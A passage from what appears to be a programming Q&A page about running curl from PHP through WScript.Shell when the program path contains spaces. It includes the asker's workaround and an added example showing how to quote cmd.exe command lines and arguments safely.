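With that password the rendered file still splits into exactly three statements, because the splitter is inside a quoted string when it meets the `;` and the `--`. If the mysql client must be used instead, give it the credentials through `--defaults-extra-file=` pointing at a mode-0600 file rather than `-p` on the command line.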

wscript.shell running file with space in path with PHP

I was trying to use WScript.Shell through COM objects with PHP to pass some cmd commands to the cURL library (the DOS version). Here is what I use to perform this task:
function windExec($cmd, $mode = '') {
    // Setup the command to run from "run"
    $cmdline = "cmd /C $cmd";
    // set-up the output and mode
    $outputfile = null;
    if ($mode == 'FG') {
        $outputfile = uniqid(time()) . ".txt";
        $cmdline .= " > $outputfile";
        $m = true;
    } else {
        $m = false;
    }
    // Make a new instance of the COM object
    $WshShell = new COM("WScript.Shell");
    // Make the command window but dont show it.
    $oExec = $WshShell->Run($cmdline, 0, $m);
    if ($outputfile) {
        // Read the tmp file.
        $retStr = file_get_contents($outputfile);
        // Delete the temp_file.
        unlink($outputfile);
    } else {
        $retStr = "";
    }
    return $retStr;
}
Now when I run this function like:
windExec("\"C:/Documents and Settings/ermac/Desktop/my project/curl\" http://www.google.com/", 'FG');
curl doesn't run because there is a problem with the path. But when I remove the spaces from the path it works great:
windExec("\"C:/curl\" http://www.google.com/", 'FG');
So my question is: how can I escape these spaces in WScript.Shell commands?
Is there any way I can fix this?
Thanks in advance :)
Never mind, I found a solution:
windExec("cd C:/Documents and Settings/ermac/Desktop/my project/libs & curl.exe -L http://www.google.com/", 'FG');
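As an added example (not code from the question or its answer), here is why the quoted path was lost and how to build the line so it is not. `cmd /C` applies a quote rule to everything after the switch: the quotes are kept only if every one of its conditions holds (exactly two quote characters, whitespace between them, none of the characters `&<>()@^|` between them, and the quoted text naming an executable file); otherwise it strips the first quote and the last quote on the line. A line that starts with `"C:/Documents and Settings/.../curl"` fails that test, so the quotes vanish and the path with spaces is split. Wrapping the whole command in one more pair of quotes and passing `/S` makes cmd strip exactly those outer quotes and nothing else, which is what the helper below does; it also quotes each argument by the C runtime's rules so a URL containing `&` survives. The curl path and URL are assumptions; WScript.Shell needs PHP's COM extension, so the run step is guarded.

```php
<?php
// Added example, not code from the original question or its answer: build the
// command line for cmd.exe so a program path with spaces survives. cmd /S /C
// strips exactly the first and last quote of the line, so the whole command is
// wrapped in one extra pair. The curl path, URL and output location are
// assumptions; WScript.Shell needs PHP's COM extension (Windows only).

// Quote one argument by the MSVCRT rules: wrap in "...", double backslashes that
// precede a quote and escape the quote itself. cmd metacharacters are quoted too.
function winQuoteArg(string $arg): string
{
    if ($arg !== '' && !preg_match('/[\s"&|<>^()]/', $arg)) {
        return $arg;
    }
    $arg = preg_replace('/(\\\\*)"/', '$1$1\\\\"', $arg);   // \ before " doubled, " escaped
    $arg = preg_replace('/(\\\\+)$/', '$1$1', $arg);        // trailing \ doubled
    return '"' . $arg . '"';
}

// Whole line for cmd.exe: /S = strip first and last quote only, /C = run and exit.
function winCommandLine(array $argv, ?string $stdoutFile = null): string
{
    $line = implode(' ', array_map('winQuoteArg', $argv));
    if ($stdoutFile !== null) {
        $line .= ' > ' . winQuoteArg($stdoutFile);
    }
    return 'cmd.exe /S /C "' . $line . '"';
}

// Run through WScript.Shell hidden and wait, then read the captured output.
function windExecArgv(array $argv): string
{
    $outFile = tempnam(sys_get_temp_dir(), 'out');      // unpredictable name, not the web root
    $shell   = new COM('WScript.Shell');
    $shell->Run(winCommandLine($argv, $outFile), 0, true);
    $text = (string)file_get_contents($outFile);
    unlink($outFile);
    return $text;
}

$curl = 'C:\Documents and Settings\ermac\Desktop\my project\curl.exe';   // assumed path
$argv = [$curl, '-L', 'http://www.google.com/?q=a&b=c'];
echo winCommandLine($argv), "\n";

if (class_exists('COM')) {
    echo windExecArgv($argv);
}
```

The printed line is `cmd.exe /S /C "..."` with the curl path and the URL each in their own quotes inside the outer pair; the `&` in the URL is safe because cmd does not interpret it inside quotes. Keeping the arguments as an array until the last step is the same discipline as escapeshellarg() on Unix: no caller ever concatenates raw strings into the command.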
